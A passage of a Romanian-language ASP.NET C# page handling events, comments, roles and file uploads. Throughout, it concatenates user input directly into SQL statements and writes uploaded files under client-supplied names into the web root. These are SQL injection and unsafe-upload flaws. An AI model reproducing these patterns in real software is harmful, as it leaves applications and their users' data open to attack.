anEvenimentLabel.Text = an.ToString();
oraEvenimentLabel.Text = ora.ToString();
minutEvenimentLabel.Text = minut.ToString();
MesajRaspuns.Text = "Editare efectuata cu succes!";
}
catch (Exception ex)
{
MesajRaspuns.Text = ex.Message;
}
sqlConnection1.Close();
}
protected void ButtonSubmitDescriere_Click(object Sender, EventArgs e)
{
SqlCommand cmd = new SqlCommand();
sqlConnection1.Open();
cmd.Connection = sqlConnection1;
cmd.CommandText = "update evenimente set descriere='" + descriereEveniment.Text + "' where id=" + Convert.ToInt32(Session["IdEvenimentSelectat"]) + ";";
cmd.CommandType = CommandType.Text;
if (descriereEveniment.Text != "")
{
cmd.ExecuteNonQuery();
descriereEvenimentLabel.Text = descriereEveniment.Text;
MesajRaspuns.Text = "Editare efectuata cu succes!";
}
else
MesajRaspuns.Text = "Eroare!";
sqlConnection1.Close();
}
protected void ButtonSubmitEtichete_Click(object Sender, EventArgs e)
{
SqlCommand cmd = new SqlCommand();
sqlConnection1.Open();
cmd.Connection = sqlConnection1;
cmd.CommandText = "update evenimente set etichete='" + etichetaEveniment.Text + "' where id=" + Convert.ToInt32(Session["IdEvenimentSelectat"]) + ";";
cmd.CommandType = CommandType.Text;
if (etichetaEveniment.Text != "")
{
cmd.ExecuteNonQuery();
etichetaEvenimentLabel.Text = etichetaEveniment.Text;
MesajRaspuns.Text = "Editare efectuata cu succes!";
}
else MesajRaspuns.Text = "Eroare!";
sqlConnection1.Close();
}
protected void ButtonSubmitOras_Click(object Sender, EventArgs e)
{
SqlCommand cmd = new SqlCommand();
sqlConnection1.Open();
cmd.Connection = sqlConnection1;
cmd.CommandText = "update evenimente set oras='" + orasEveniment.Text + "' where id=" + Convert.ToInt32(Session["IdEvenimentSelectat"]) + ";";
cmd.CommandType = CommandType.Text;
if (orasEveniment.Text != "")
{
cmd.ExecuteNonQuery();
orasEvenimentLabel.Text = orasEveniment.Text;
MesajRaspuns.Text = "Editare efectuata cu succes!";
}
else MesajRaspuns.Text = "Eroare!";
sqlConnection1.Close();
}
protected void ButtonSubmitJudet_Click(object Sender, EventArgs e)
{
SqlCommand cmd = new SqlCommand();
sqlConnection1.Open();
cmd.Connection = sqlConnection1;
cmd.CommandText = "update evenimente set judet='" + judetEveniment.Text + "' where id=" + Convert.ToInt32(Session["IdEvenimentSelectat"]) + ";";
cmd.CommandType = CommandType.Text;
if (judetEveniment.Text != "")
{
cmd.ExecuteNonQuery();
judetEvenimentLabel.Text = judetEveniment.Text;
MesajRaspuns.Text = "Editare efectuata cu succes!";
}
else MesajRaspuns.Text = "Eroare!";
sqlConnection1.Close();
}
protected void ButtonSubmitTara_Click(object Sender, EventArgs e)
{
SqlCommand cmd = new SqlCommand();
sqlConnection1.Open();
cmd.Connection = sqlConnection1;
cmd.CommandText = "update evenimente set tara='" + taraEveniment.Text + "' where id=" + Convert.ToInt32(Session["IdEvenimentSelectat"]) + ";";
cmd.CommandType = CommandType.Text;
if (taraEveniment.Text != "")
{
cmd.ExecuteNonQuery();
taraEvenimentLabel.Text = taraEveniment.Text;
MesajRaspuns.Text = "Editare efectuata cu succes!";
}
else MesajRaspuns.Text = "Eroare!";
sqlConnection1.Close();
}
protected void ButonInvitaOrganizatori_Click(object sender, EventArgs e)
{
Response.Redirect("OrganizatoriEveniment.aspx");
}
protected void ButtonInformatii_Click(object sender, EventArgs e)
{
PanelInformatii.Visible = true;
PanelInscriere.Visible = false;
PanelResurse.Visible = false;
PanelForum.Visible = false;
}
protected void ButtonInscriere_Click(object sender, EventArgs e)
{
PanelInformatii.Visible = false;
PanelInscriere.Visible = true;
PanelResurse.Visible = false;
PanelForum.Visible = false;
}
protected void ButtonResurse_Click(object sender, EventArgs e)
{
PanelInformatii.Visible = false;
PanelInscriere.Visible = false;
PanelResurse.Visible = true;
PanelForum.Visible = false;
}
protected void ButtonForum_Click(object sender, EventArgs e)
{
// if (PanelForum.Visible == true) PanelComentarii.Controls.Clear();
// if (PanelComentarii.Controls.Count > 0) return;
PanelInformatii.Visible = false;
PanelInscriere.Visible = false;
PanelResurse.Visible = false;
PanelForum.Visible = true;
SqlCommand cmd = new SqlCommand();
sqlConnection1.Open();
cmd.Connection = sqlConnection1;
cmd.CommandText = "select * from replici where id_eveniment=" + Convert.ToInt32(Session["IdEvenimentSelectat"]) + " and id_parinte=-1 order by data desc;";
cmd.CommandType = CommandType.Text;
if ((PanelComentarii.FindControl("kid")) == null)
{
Label k = new Label();
k.Text = "Comentarii:";
k.ID = "kid";
PanelComentarii.Controls.Add(k);
PanelComentarii.Controls.Add(new LiteralControl("</br>"));
PanelComentarii.Controls.Add(new LiteralControl("</br>"));
}
using (SqlDataReader SRD = cmd.ExecuteReader())
{
while (SRD.Read())
{
TextBox t2 = new TextBox();
t2.ID = "Comentariu" + SRD.GetInt32(SRD.GetOrdinal("id")).ToString();
if ((PanelComentarii.FindControl(t2.ID)) == null)
{
Label l = new Label();
Label l2 = new Label();
TextBox t = new TextBox();
Button btn = new Button();
Button btn2 = new Button();
l.Text = "Autor: " + SRD.GetString(SRD.GetOrdinal("autor")).ToString();
PanelComentarii.Controls.Add(l);
PanelComentarii.Controls.Add(new LiteralControl("</br>"));
l2.Text = "Data: " + SRD.GetDateTime(SRD.GetOrdinal("data")).ToString();
PanelComentarii.Controls.Add(l2);
PanelComentarii.Controls.Add(new LiteralControl("</br>"));
t.ID = "Comentariu" + SRD.GetInt32(SRD.GetOrdinal("id")).ToString();
t.Text = SRD.GetString(SRD.GetOrdinal("text"));
t.Enabled = false;
t.BorderWidth = 0;
t.BackColor = System.Drawing.ColorTranslator.FromHtml("#FFFFFF");
PanelComentarii.Controls.Add(t);
PanelComentarii.Controls.Add(new LiteralControl("</br>"));
btn.ID = "Sterge" + SRD.GetInt32(SRD.GetOrdinal("id")).ToString();
btn.Text = "Sterge";
btn.CssClass = "btn btn-danger";
btn.Click += new EventHandler(ComentariuSterge);
if (Session["nume"] == null)
btn.Visible = false;
else if (SRD.GetString(SRD.GetOrdinal("autor")).ToString().ToUpper() != Session["nume"].ToString().ToUpper())
btn.Visible = false;
if (Proprietar || Organizator)
btn.Visible = true;
PanelComentarii.Controls.Add(btn);
btn2.ID = "Raspunde" + SRD.GetInt32(SRD.GetOrdinal("id")).ToString();
btn2.Text = "Raspunde";
btn2.CssClass = "btn btn-warning";
btn2.ToolTip = SRD.GetInt32(SRD.GetOrdinal("id")).ToString();
if (Session["nume"] == null)
btn2.Visible = false;
btn2.Click += new EventHandler(ComentariuRaspunde);
PanelComentarii.Controls.Add(btn2);
PanelComentarii.Controls.Add(new LiteralControl("</br>"));
if (!(Session["idtata"] == null))
if (Session["idtata"].ToString() == SRD.GetInt32(SRD.GetOrdinal("id")).ToString())
{
TextBox rsp = new TextBox();
rsp.ID = "rsp2";
rsp.Columns = 100;
rsp.MaxLength = 500;
rsp.Rows = 5;
rsp.TextMode = TextBoxMode.MultiLine;
PanelComentarii.Controls.Add(rsp);
PanelComentarii.Controls.Add(new LiteralControl("</br>"));
Button btn3 = new Button();
btn3.ID = "rsp";
btn3.Text = "Posteaza";
btn3.ToolTip = SRD.GetInt32(SRD.GetOrdinal("id")).ToString();
btn3.Click += new EventHandler(ComentariuRaspundePosteaza);
PanelComentarii.Controls.Add(btn3);
PanelComentarii.Controls.Add(new LiteralControl("</br>"));
}
PanelForum.Controls.Add(new LiteralControl("</br>"));
sqlConnection2.Open();
SqlCommand cmd5 = new SqlCommand();
cmd5.Connection = sqlConnection2;
cmd5.CommandText = "select * from replici where id_eveniment=" + Convert.ToInt32(Session["IdEvenimentSelectat"]) + " and id_parinte=" + SRD.GetInt32(SRD.GetOrdinal("id")) + " order by data desc;";
cmd5.CommandType = CommandType.Text;
//////////////////////////////////////////////////////
using (SqlDataReader SRD5 = cmd5.ExecuteReader())
{
while (SRD5.Read())
{
TextBox t25 = new TextBox();
t25.ID = "Comentariu" + SRD5.GetInt32(SRD5.GetOrdinal("id")).ToString();
if ((PanelComentarii.FindControl(t25.ID)) == null)
{
Label l5 = new Label();
Label l25 = new Label();
TextBox t5 = new TextBox();
Label l255 = new Label();
Button btn5 = new Button();
l5.Style.Add("padding-left", "100px");
l25.Style.Add("padding-left", "100px");
t5.Style.Add("padding-left", "100px");
l255.Style.Add("padding-left", "100px");
l5.Text = "Autor: " + SRD5.GetString(SRD5.GetOrdinal("autor")).ToString();
PanelComentarii.Controls.Add(l5);
PanelComentarii.Controls.Add(new LiteralControl("</br>"));
l25.Text = "Data: " + SRD5.GetDateTime(SRD5.GetOrdinal("data")).ToString();
PanelComentarii.Controls.Add(l25);
PanelComentarii.Controls.Add(new LiteralControl("</br>"));
t5.ID = "Comentariu" + SRD5.GetInt32(SRD5.GetOrdinal("id")).ToString();
t5.Text = SRD5.GetString(SRD5.GetOrdinal("text"));
t5.Enabled = false;
t5.BorderWidth = 0;
t5.BackColor = System.Drawing.ColorTranslator.FromHtml("#FFFFFF");
PanelComentarii.Controls.Add(t5);
PanelComentarii.Controls.Add(new LiteralControl("</br>"));
l255.Text = "";
PanelComentarii.Controls.Add(l255);
btn5.ID = "Sterge" + SRD5.GetInt32(SRD5.GetOrdinal("id")).ToString();
btn5.Text = "Sterge";
if (Session["nume"] == null)
btn5.Visible = false;
if (Session["nume"] != null)
if (SRD5.GetString(SRD5.GetOrdinal("autor")).ToString().ToUpper() != Session["nume"].ToString().ToUpper())
btn5.Visible = false;
if (Organizator || Proprietar)
btn5.Visible = true;
btn5.CssClass = "btn btn-danger";
btn5.Click += new EventHandler(ComentariuSterge);
PanelComentarii.Controls.Add(btn5);
PanelComentarii.Controls.Add(new LiteralControl("</br>"));
PanelForum.Controls.Add(new LiteralControl("</br>"));
// PanelForum.Controls.Add(new LiteralControl("<p></p>"));
}
else break;
}
}
sqlConnection2.Close();
// PanelForum.Controls.Add(new LiteralControl("<p></p>"));
}
else break;
}
}
sqlConnection1.Close();
}
protected void ButtonAdaugaRol2_Click(object sender, EventArgs e)
{
LabelDenumire.Visible = true;
LabelDescriere.Visible = true;
LabelMaxUsers.Visible = true;
DenumireRol.Visible = true;
DescriereRol.Visible = true;
MaxUsers.Visible = true;
ButtonSubmitRol2.Visible = true;
ButtonAdaugaRol2.Visible = false;
div_rol.Visible = true;
}
protected void ButtonSubmitRol2_Click(object sender, EventArgs e)
{
string den = "", desc = "", max_u = "";
int max = 0;
den = DenumireRol.Text;
desc = DescriereRol.Text;
if (MaxUsers.Text != "")
{
try
{
max_u = MaxUsers.Text;
max = Convert.ToInt32(max_u);
}
catch (Exception ex)
{
LabelEroareRol.Text = "Valoare utilizatori maximi nu este valida!";
}
}
if (den == "" || desc == "")
{
LabelEroareRol.Text = "Campurile Denumire si Descriere sunt obligatorii!";
}
else
{
int nr = 0;
SqlCommand cmd = new SqlCommand();
cmd.Connection = sqlConnection1;
cmd.CommandText = "select max(Id) as numar from roluri";
cmd.CommandType = CommandType.Text;
sqlConnection1.Open();
using (SqlDataReader SRD = cmd.ExecuteReader())
{
while (SRD.Read())
{
try
{
nr = SRD.GetInt32(SRD.GetOrdinal("numar"));
}
catch (Exception ex)
{
nr = 0;
}
}
}
sqlConnection1.Close();
nr++;
cmd = new SqlCommand("INSERT INTO roluri(Id, id_eveniment, denumire, descriere, max_participanti) values(" + nr + ", " + Convert.ToInt32(Session["IdEvenimentSelectat"]) + ", '" + den + "','" + desc + "', " + max + ")", sqlConnection1);
sqlConnection1.Open();
cmd.ExecuteNonQuery();
sqlConnection1.Close();
LabelEroareRol.Text = "Rol adaugat cu succes!";
LabelDenumire.Visible = false;
LabelDescriere.Visible = false;
LabelMaxUsers.Visible = false;
DenumireRol.Visible = false;
DescriereRol.Visible = false;
MaxUsers.Visible = false;
ButtonSubmitRol2.Visible = false;
ButtonAdaugaRol2.Visible = true;
Afiseaza_Roluri();
}
}
private void Afiseaza_Roluri()
{
PanelRoluri.Controls.Clear();
int nr = 0, max = 0, ok = 0, rol = 0;
SqlCommand cmd3 = new SqlCommand();
cmd3.Connection = sqlConnection1;
cmd3.CommandType = CommandType.Text;
cmd3.CommandText = "select count(*) as numar from participa where id_eveniment=" + Convert.ToInt32(Session["IdEvenimentSelectat"]) + " and id_utilizator=" + Convert.ToInt32(Session["Id"]);
sqlConnection1.Open();
using (SqlDataReader SRD = cmd3.ExecuteReader())
{
while (SRD.Read())
{
ok = SRD.GetInt32(SRD.GetOrdinal("numar"));
}
}
sqlConnection1.Close();
if (ok != 0)
{
SqlCommand cmd4 = new SqlCommand();
cmd4.Connection = sqlConnection1;
cmd4.CommandType = CommandType.Text;
cmd4.CommandText = "select id_rol from participa where id_eveniment=" + Convert.ToInt32(Session["IdEvenimentSelectat"]) + " and id_utilizator=" + Convert.ToInt32(Session["Id"]);
sqlConnection1.Open();
using (SqlDataReader SRD = cmd4.ExecuteReader())
{
while (SRD.Read())
{
rol = SRD.GetInt32(SRD.GetOrdinal("id_rol"));
}
}
sqlConnection1.Close();
}
SqlCommand cmd = new SqlCommand();
cmd.Connection = sqlConnection1;
cmd.CommandType = CommandType.Text;
cmd.CommandText = "select * from roluri where id_eveniment=" + Convert.ToInt32(Session["IdEvenimentSelectat"]);
sqlConnection1.Open();
PanelRoluri.Controls.Add(new LiteralControl("</br></br>"));
using (SqlDataReader SRD = cmd.ExecuteReader())
{
while (SRD.Read())
{
Label l1 = new Label();
l1.Text = SRD.GetString(SRD.GetOrdinal("denumire")).ToString() + " ";
PanelRoluri.Controls.Add(l1);
if (SRD.GetString(SRD.GetOrdinal("descriere")).ToString() != "")
{
Label l3 = new Label();
l3.Text = "<br />Descriere: " + SRD.GetString(SRD.GetOrdinal("descriere")).ToString() + " ";
PanelRoluri.Controls.Add(l3);
}
max = SRD.GetInt32(SRD.GetOrdinal("max_participanti"));
sqlConnection2.Open();
SqlCommand cmd2 = new SqlCommand();
cmd2.Connection = sqlConnection2;
cmd2.CommandType = CommandType.Text;
cmd2.CommandText = "select count(*) as numar from participa where id_rol=" + SRD.GetInt32(SRD.GetOrdinal("Id"));
using (SqlDataReader SRD2 = cmd2.ExecuteReader())
{
while (SRD2.Read())
{
nr = SRD2.GetInt32(SRD2.GetOrdinal("numar"));
}
}
sqlConnection2.Close();
if (Session["Nume"] != null && ok == 0 && nr < max)
{
Button Button1 = new Button();
Button1.Text = "Inrolare";
Button1.ID = SRD.GetInt32(SRD.GetOrdinal("Id")).ToString();
Button1.Click += new EventHandler(Inrolare);
Button1.CssClass = "btn btn-success";
PanelRoluri.Controls.Add(Button1);
}
else
if (Session["Nume"] != null && ok == 0 && max == 0)
{
Button Button1 = new Button();
Button1.Text = "Inrolare";
Button1.ID = SRD.GetInt32(SRD.GetOrdinal("Id")).ToString();
Button1.CssClass = "btn btn-success";
Button1.Click += new EventHandler(Inrolare);
PanelRoluri.Controls.Add(Button1);
}
if (rol == SRD.GetInt32(SRD.GetOrdinal("Id")))
{
Button Button2 = new Button();
Button2.Text = "Refuza";
Button2.CssClass = "btn btn-danger";
Button2.ID = SRD.GetInt32(SRD.GetOrdinal("Id")).ToString();
Button2.Click += new EventHandler(RefuzaInrolare);
PanelRoluri.Controls.Add(Button2);
}
if ((Proprietar || Organizator) && (SRD.GetString(SRD.GetOrdinal("denumire")).ToString() != "Participant") && nr == 0)
{
Button Button3 = new Button();
Button3.Text = "<NAME>";
Button3.ID = SRD.GetInt32(SRD.GetOrdinal("Id")).ToString() + "a";
Button3.CssClass = "btn btn-danger";
Button3.Click += new EventHandler(StergeRol);
PanelRoluri.Controls.Add(Button3);
}
/*if (Proprietar || Organizator)
{
Button Button4 = new Button();
Button4.Text = "Participanti";
Button4.ID = SRD.GetInt32(SRD.GetOrdinal("Id")).ToString() + "b";
Button4.CssClass = "btn btn-warning";
Button4.Click += new EventHandler(AfiseazaUtilizatoriRol);
PanelRoluri.Controls.Add(Button4);
}*/
if (max != 0)
{
Label l2 = new Label();
l2.Text = "<br />Deja inrolati: " + nr + "/" + max;
PanelRoluri.Controls.Add(l2);
}
else
{
Label l2 = new Label();
l2.Text = "<br />Deja inrolati: " + nr;
PanelRoluri.Controls.Add(l2);
}
PanelRoluri.Controls.Add(new LiteralControl("<br /><br />"));
}
}
PanelRoluri.Controls.Add(new LiteralControl("<br /><br />"));
sqlConnection1.Close();
}
private void Inrolare(object sender, EventArgs e)
{
Button x = (Button)sender;
int id = 0;
id = Convert.ToInt32(x.ID);
SqlCommand cmd = new SqlCommand();
cmd.Connection = sqlConnection1;
cmd.CommandType = CommandType.Text;
cmd.CommandText = "insert into participa(id_utilizator, id_rol, id_eveniment) values(" + Convert.ToInt32(Session["Id"]) + ", " + id + ", " + Convert.ToInt32(Session["IdEvenimentSelectat"]) + ")";
sqlConnection1.Open();
cmd.ExecuteNonQuery();
sqlConnection1.Close();
Afiseaza_Roluri();
}
private void RefuzaInrolare(object sender, EventArgs e)
{
Button x = (Button)sender;
int id = 0;
id = Convert.ToInt32(x.ID);
SqlCommand cmd = new SqlCommand();
cmd.Connection = sqlConnection1;
cmd.CommandType = CommandType.Text;
cmd.CommandText = "delete from participa where id_utilizator=" + Convert.ToInt32(Session["Id"]) + " and id_rol=" + id + " and id_eveniment=" + Convert.ToInt32(Session["IdEvenimentSelectat"]);
sqlConnection1.Open();
cmd.ExecuteNonQuery();
sqlConnection1.Close();
Afiseaza_Roluri();
}
private void StergeRol(object sender, EventArgs e)
{
Button x = (Button)sender;
int id = 0;
string temp = x.ID;
temp = temp.TrimEnd('a');
id = Convert.ToInt32(temp);
SqlCommand cmd = new SqlCommand();
cmd.Connection = sqlConnection1;
cmd.CommandType = CommandType.Text;
cmd.CommandText = "delete from roluri where Id=" + id;
sqlConnection1.Open();
cmd.ExecuteNonQuery();
sqlConnection1.Close();
Afiseaza_Roluri();
LabelEroareRol.Text = "Rol sters cu succes!";
}
/*private void AfiseazaUtilizatoriRol(object sender, EventArgs e)
{
PanelParticipanti.Visible = true;
PanelParticipanti.Controls.Clear();
Button x = (Button)sender;
int id = 0, id_util = 0;
string temp = x.ID;
temp = temp.TrimEnd('b');
id = Convert.ToInt32(temp);
SqlCommand cmd = new SqlCommand();
cmd.Connection = sqlConnection1;
cmd.CommandType = CommandType.Text;
cmd.CommandText = "select * from participa where id_rol=" + id;
sqlConnection1.Open();
PanelParticipanti.Controls.Add(new LiteralControl("<div class='panel panel-success' style='max-width:40%'><div class='panel-heading'></br>"));
using (SqlDataReader SRD = cmd.ExecuteReader())
{
while (SRD.Read())
{
id_util = SRD.GetInt32(SRD.GetOrdinal("id_utilizator"));
sqlConnection2.Open();
SqlCommand cmd2 = new SqlCommand();
cmd2.Connection = sqlConnection2;
cmd2.CommandType = CommandType.Text;
cmd2.CommandText = "select id, acont from utilizator where id=" + id_util;
using (SqlDataReader SRD2 = cmd2.ExecuteReader())
{
while (SRD2.Read())
{
Label l1 = new Label();
l1.Text =SRD2.GetString(SRD2.GetOrdinal("acont")).ToString() + " ";
PanelParticipanti.Controls.Add(l1);
Button Button5 = new Button();
Button5.Text = "Elimina";
Button5.ID = SRD2.GetInt32(SRD2.GetOrdinal("id")).ToString() + "c";
Button5.Click += new EventHandler(EliminaParticipant);
Button5.CssClass = "btn btn-danger";
PanelParticipanti.Controls.Add(Button5);
PanelParticipanti.Controls.Add(new LiteralControl("</br></br>"));
}
}
sqlConnection2.Close();
}
}
PanelParticipanti.Controls.Add(new LiteralControl("</div></div>"));
Button Button2 = new Button();
Button2.Text = "Ascunde";
Button2.Click += new EventHandler(AscundeParticipanti);
Button2.CssClass = "btn btn-success";
PanelParticipanti.Controls.Add(Button2);
LabelEroareRol.Text = "weird";
sqlConnection1.Close();
}*/
private void EliminaParticipant(object sender, EventArgs e)
{
Button x = (Button)sender;
int id = 0;
string temp = x.ID;
temp = temp.TrimEnd('c');
id = Convert.ToInt32(temp);
SqlCommand cmd7 = new SqlCommand();
cmd7.Connection = sqlConnection1;
cmd7.CommandType = CommandType.Text;
cmd7.CommandText = "delete from participa where id_utilizator=" + id + " and id_eveniment=" + Convert.ToInt32(Session["IdEvenimentSelectat"]);
sqlConnection1.Open();
cmd7.ExecuteNonQuery();
sqlConnection1.Close();
AfiseazaParticipanti();
Afiseaza_Roluri();
}
private void AscundeParticipanti(object sender, EventArgs e)
{
PanelParticipanti.Controls.Clear();
PanelParticipanti.Visible = false;
}
private void ButtonAfiseazaParticipanti_Click(object sender, EventArgs e)
{
PanelParticipanti.Visible = true;
}
protected void AfiseazaParticipanti()
{
int id_util = 0;
PanelParticipanti.Controls.Clear();
SqlCommand cmd = new SqlCommand();
cmd.Connection = sqlConnection1;
cmd.CommandType = CommandType.Text;
cmd.CommandText = "select * from participa where id_eveniment =" + Convert.ToInt32(Session["IdEvenimentSelectat"]);
sqlConnection1.Open();
PanelParticipanti.Controls.Add(new LiteralControl("<div class='panel panel-success' style='max-width:40%'><div class='panel-heading'></br>"));
using (SqlDataReader SRD = cmd.ExecuteReader())
{
while (SRD.Read())
{
id_util = SRD.GetInt32(SRD.GetOrdinal("id_utilizator"));
sqlConnection2.Open();
SqlCommand cmd2 = new SqlCommand();
cmd2.Connection = sqlConnection2;
cmd2.CommandType = CommandType.Text;
cmd2.CommandText = "select id, acont from utilizator where id=" + id_util;
using (SqlDataReader SRD2 = cmd2.ExecuteReader())
{
while (SRD2.Read())
{
Label l1 = new Label();
l1.Text = SRD2.GetString(SRD2.GetOrdinal("acont")).ToString() + " ";
PanelParticipanti.Controls.Add(l1);
if (Proprietar || Organizator)
{
Button Button5 = new Button();
Button5.Text = "Elimina";
Button5.ID = SRD2.GetInt32(SRD2.GetOrdinal("id")).ToString() + "c";
Button5.Click += new EventHandler(EliminaParticipant);
Button5.CssClass = "btn btn-danger";
PanelParticipanti.Controls.Add(Button5);
}
PanelParticipanti.Controls.Add(new LiteralControl("</br></br>"));
}
}
sqlConnection2.Close();
}
}
PanelParticipanti.Controls.Add(new LiteralControl("</div></div>"));
Button Button2 = new Button();
Button2.Text = "Ascunde";
Button2.Click += new EventHandler(AscundeParticipanti);
Button2.CssClass = "btn btn-success";
PanelParticipanti.Controls.Add(Button2);
sqlConnection1.Close();
}
private void Afiseaza_Fisiere()
{
PanelShow.Controls.Clear();
SqlCommand cmd = new SqlCommand();
cmd.Connection = sqlConnection1;
cmd.CommandType = CommandType.Text;
cmd.CommandText = "select * from documente where id_eveniment=" + Convert.ToInt32(Session["IdEvenimentSelectat"]);
sqlConnection1.Open();
PanelShow.Controls.Add(new LiteralControl("</br><div class='panel panel-info'> <div class='panel-heading'></br>"));
using (SqlDataReader SRD = cmd.ExecuteReader())
{
while (SRD.Read())
{
Label l1 = new Label();
l1.Text = "Fisier: " + SRD.GetString(SRD.GetOrdinal("document")).ToString() + " ";
PanelShow.Controls.Add(l1);
Label l2 = new Label();
l2.Text = "Data: " + SRD.GetString(SRD.GetOrdinal("data_incarcare")).ToString() + " ";
PanelShow.Controls.Add(l2);
if (Proprietar || Organizator)
{
Button Button1 = new Button();
Button1.Text = "Delete";
Button1.CssClass = "btn btn-danger";
Button1.ID = "delete_" + SRD.GetInt32(SRD.GetOrdinal("Id")).ToString();
Button1.Click += new EventHandler(DeleteFisier);
PanelShow.Controls.Add(Button1);
}
Button Button2 = new Button();
Button2.Text = "Download";
Button2.ID = "download_" + SRD.GetInt32(SRD.GetOrdinal("Id")).ToString();
Button2.CssClass = "btn btn-success";
Button2.Click += new EventHandler(DownloadFisier);
PanelShow.Controls.Add(Button2);
PanelShow.Controls.Add(new LiteralControl("</br>"));
}
}
PanelShow.Controls.Add(new LiteralControl("</br></div></div></br>"));
sqlConnection1.Close();
}
private void DeleteFisier(object sender, EventArgs e)
{
Button x = (Button)sender;
int id = 0; string nume = "";
id = Convert.ToInt32(x.ID.Substring(7));
SqlCommand cmd = new SqlCommand();
cmd.Connection = sqlConnection1;
cmd.CommandType = CommandType.Text;
cmd.CommandText = "select document from documente where Id=" + id;
sqlConnection1.Open();
using (SqlDataReader SRD = cmd.ExecuteReader())
{
while (SRD.Read())
{
nume = SRD.GetString(SRD.GetOrdinal("document")).ToString();
}
}
sqlConnection1.Close();
File.Delete(Server.MapPath(nume));
SqlCommand cmd2 = new SqlCommand();
cmd2.Connection = sqlConnection1;
cmd2.CommandType = CommandType.Text;
cmd2.CommandText = "delete from documente where Id=" + id;
sqlConnection1.Open();
cmd2.ExecuteNonQuery();
sqlConnection1.Close();
Afiseaza_Fisiere();
lblInfo.Text = "Fisier sters cu succes!";
}
private void DownloadFisier(object sender, EventArgs e)
{
Button x = (Button)sender;
int id = 0; string nume = "";
id = Convert.ToInt32(x.ID.Substring(9));
SqlCommand cmd = new SqlCommand();
cmd.Connection = sqlConnection1;
cmd.CommandType = CommandType.Text;
cmd.CommandText = "select document from documente where Id=" + id;
sqlConnection1.Open();
using (SqlDataReader SRD = cmd.ExecuteReader())
{
while (SRD.Read())
{
nume = SRD.GetString(SRD.GetOrdinal("document")).ToString();
}
}
sqlConnection1.Close();
if (nume.Contains(".htm") || nume.Contains(".html"))
{
Response.ContentType = "text/HTML";
}
if (nume.Contains(".txt"))
{
Response.ContentType = "text/plain";
}
if (nume.Contains(".doc") || nume.Contains(".rtf") || nume.Contains(".docx"))
{
Response.ContentType = "Application/msword";
}
if (nume.Contains(".xls") || nume.Contains(".xlsx"))
{
Response.ContentType = "Application/x-msexcel";
}
if (nume.Contains(".jpg") || nume.Contains(".jpeg"))
{
Response.ContentType = "image/jpeg";
}
if (nume.Contains(".gif"))
{
Response.ContentType = "image/GIF";
}
if (nume.Contains(".pdf"))
{
Response.ContentType = "application/pdf";
}
Response.AppendHeader("Content-Disposition", "attachment; filename="+nume+"");
Response.TransmitFile(Server.MapPath(nume));
Response.End();
}
private void cmdSend_Click(object sender, System.EventArgs e)
{
int ok = 0;
if (filMyFile.PostedFile != null)
{
HttpPostedFile myFile = filMyFile.PostedFile;
int nFileLen = myFile.ContentLength;
if (nFileLen > 0)
{
byte[] myData = new byte[nFileLen];
string dt = DateTime.Now.ToString("d"); ;
myFile.InputStream.Read(myData, 0, nFileLen);
string strFilename = Path.GetFileName(myFile.FileName);
SqlCommand cmd = new SqlCommand();
cmd.Connection = sqlConnection1;
cmd.CommandType = CommandType.Text;
cmd.CommandText = "select count(*) as numar from documente where document='" + strFilename + "'";
sqlConnection1.Open();
using (SqlDataReader SRD = cmd.ExecuteReader())
{
while (SRD.Read())
{
ok = SRD.GetInt32(SRD.GetOrdinal("numar"));
}
}
sqlConnection1.Close();
if (ok == 0)
{
WriteToFile(Server.MapPath(strFilename), ref myData);
UpdateDatabaseDoc(strFilename, dt);
lblInfo.Text =
"Filename: " + strFilename + "<br>" +
"Date: " + dt + "<br> Fisier uploadat cu succes!<p>";
Afiseaza_Fisiere();
}
else
{
lblInfo.Text = "Fisier deja existent!";
}
}
}
}
private void UpdateDatabaseDoc(string Name, string date)
{
int nr = 0;
SqlCommand cmd5 = new SqlCommand();
cmd5.Connection = sqlConnection1;
cmd5.CommandText = "select max(Id) as numar from documente";
cmd5.CommandType = CommandType.Text;
sqlConnection1.Open();
using (SqlDataReader SRD5 = cmd5.ExecuteReader())
{
while (SRD5.Read())
{
try { nr = SRD5.GetInt32(SRD5.GetOrdinal("numar")); }
catch (Exception ex) { nr = 0; }
}
}
sqlConnection1.Close();
nr++;
SqlCommand cmd = new SqlCommand();
sqlConnection1.Open();
cmd = new SqlCommand("INSERT INTO documente(Id, id_eveniment, document, data_incarcare) VALUES(" + nr + ", " + Convert.ToInt32(Session["IdEvenimentSelectat"]) + ", '" + Name + "', '" + date + "')", sqlConnection1);
cmd.ExecuteNonQuery();
sqlConnection1.Close();
}
private void WriteToFile(string strPath, ref byte[] Buffer)
{
FileStream newFile = new FileStream(strPath, FileMode.Create);
newFile.Write(Buffer, 0, Buffer.Length);
newFile.Close();
}
private string GetMyName()
{
string strScript = Request.ServerVariables["SCRIPT_NAME"];
int nPos = strScript.LastIndexOf("/");
if (nPos > -1)
strScript = strScript.Substring(nPos + 1);
return strScript;
}
protected void ButtonComentariu_Click(object sender, EventArgs e)
{
PanelComentariuNou.Visible = true;
ButtonForum_Click(sender, e);
}
protected void ButtonScrieComentariu_Click(object sender, EventArgs e)
{
SqlCommand cmd = new SqlCommand();
sqlConnection1.Open();
cmd.Connection = sqlConnection1;
int idev = Convert.ToInt32(Session["IdEvenimentSelectat"]);
string text = TextBoxComentariuNou.Text, autor = Session["nume"].ToString();
cmd.CommandText = "INSERT INTO replici (id_eveniment,text,autor) VALUES (" + idev + ",'" + text + "','" + autor + "');";
cmd.CommandType = CommandType.Text;
cmd.ExecuteNonQuery();
sqlConnection1.Close();
PanelComentariuNou.Visible = false;
ButtonForum_Click(sender, e);
}
protected void ComentariuSterge(object sender, EventArgs e)
{
SqlCommand cmd = new SqlCommand();
sqlConnection1.Open();
cmd.Connection = sqlConnection1;
Button btn = (Button)sender;
int id = Convert.ToInt32(btn.ID.Substring(6));
cmd.CommandText = "DELETE FROM replici WHERE id=" + id + ";";
cmd.CommandType = CommandType.Text;
cmd.ExecuteNonQuery();
sqlConnection1.Close();
PanelComentariuNou.Visible = false;
ButtonForum_Click(sender, e);
}
protected void ComentariuRaspunde(object sender, EventArgs e)
{
SqlCommand cmd = new SqlCommand();
// sqlConnection1.Open();
// cmd.Connection = sqlConnection1;
Button btn = (Button)sender;
int idev = Convert.ToInt32(Session["IdEvenimentSelectat"]);
// string text = TextBoxComentariuNou.Text, autor = Session["nume"].ToString();
// cmd.CommandText = "INSERT INTO replici (id_eveniment,text,autor,id_parinte) VALUES (" + idev + ",'" + text + "','" + autor + "',"+Convert.ToInt32(btn.ToolTip)+");";
// cmd.CommandType = CommandType.Text;
// cmd.ExecuteNonQuery();
Session["idtata"] = btn.ID.ToString().Substring(8);
